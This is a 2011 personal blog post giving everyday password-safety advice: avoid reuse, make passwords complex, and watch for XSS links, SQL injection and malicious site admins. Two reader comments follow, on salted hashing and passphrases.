Thursday, November 24, 2011

Give Me Your Password Punk!


If you immediately felt like spouting off a password that you use for all social networking sites, email accounts, and anything else, DON'T DO THAT! There are enough ways that potential malicious persons could gain access to your valuable information and accounts, without you handing it to them. Let me give you a look behind the computer screen of password theives around the globe.

Let me tell you, it does not have to be a huge deal to get access to your password. I used to be a security adviser for websites, and occasionally still help out websites that I find flaws in. I could show anyone reading this how to get access to somebodies personal information in half an hour. (I won't, but I could). You may ask, "If it is that easy, then how do I protect myself?"

Make it Harder for them:
The correct response to someone waving a gun and asking for your password is, "Which one?" The biggest mistake you could make is having the same username and password for everything you do. If one of your accounts is breached, with any of the techniques I highlight below, and you have the same login credentials for every nook and cranny you occupy on the internet, you are in big trouble. Change those passwords! Do not make it easy for anybody to control your online presence.

I have created a hierarchy of passwords, based on my security needs and how much I can trust the website. I use different passwords for each of my e-mail accounts. (E-mail accounts need the most security because you can reset the rest of your passwords with them.) Then social sites have a very secure password. However, for smaller and less secure sites I will use another password all together, giving me more lines of defense between me and the potential hacker/cracker.

Password Complexity:
The most upfront approach to obtaining a password is to "Brute Force" it. There is an array of cracking programs that will guess passwords, one at a time. The website you are using should have some max login attempt, with some sort of lock, but let us not leave this up to chance.

The programs that "crack" passwords will use dictionaries, to guess words, and alphanumeric combinations to attempt to nail down your account. You want to make this as hard to do as possible. Use How Secure Is My Password to figure out how long it would take for "crackers" to gain access. This site is also great at catching some of the pit-falls like using a commonly used password.

How do I get Hacked?
Your head would spin if I outlined every way you could lose your online identity. I will give you the most common (and unfortunately easiest) ways that will eventually come your way.

Cross site scripting (XSS) is a serious threat.  You will not know what even hit you if you do not pay attention to your URL redirects. Javascript redirects placed on websites that do not block users from inserting their own code, or a well disguised bit.ly link can get you in trouble. Hackers will create a webpage that takes your cookies, or website information, and redirect you back to the website. They will look back at their log that was created by all of the unknowing victims, and do what they please.

You can stop this by turning off javascript redirects, and not following unknown links or videos. You can also turn off javascript all together if you are really worried.

SQL injection is not really something that you can stop, but a problem with the website you are using. Hackers can put lines of code that are parsed on the server that will change the way the website is intended to work. I have personally used a mind-numbing, four character, simple injection to gain access to account information and much more. I won't tell you what it is you have to find it yourself. SQL injection is illegal as far as I know, do not try it unless you have permission and you do not fear being sued!

The moral of this story is only trust websites that are secure. Again using different passwords for different logins will help you build up your defenses to protect your information.


Malicious Admins are an often a under estimated threat. Not only do they have access to the information on their site but can use your login information for other sites. Many users use the same password between sites. Use the same username and password on Google, or Twitter and you are done for.

If you want to learn more about your security, Check out http://www.hackthissite.org/. This gives you a perfectly legal way to learn and test the methods that can be used against you. Please use this for Educational Purposes Only!

If you have any other information that you think should have been added, tell me in the comments. You can also contact me via our Google+ page, or Twitter. If you liked what you read please let me know, by sharing and liking!

2 comments:

  1. Any decent big name website does a salted hash of your password when it stores it in the database, so malicious admins aren't a problem. It's a one way encryption so they can't just pull the data out of their SQL tables and use it. That means they have all your data EXCEPT your password, the most crucial part, and if you don't trust them with the rest of the data don't register on that site. Likewise I'd like to point out this web-comic as disproving of common password complexity techniques and recommending new, stronger practices: http://xkcd.com/936/ and I'll throw in this gem: https://www.grc.com/haystack.htm
    Good day homie and peace out

    ReplyDelete
  2. Yes both valid points! I was talking about smaller websites that you may wish to use. That's why I added the bit about the hierarchy of passwords. I also love xkcd!

    Thanks anon!

    ReplyDelete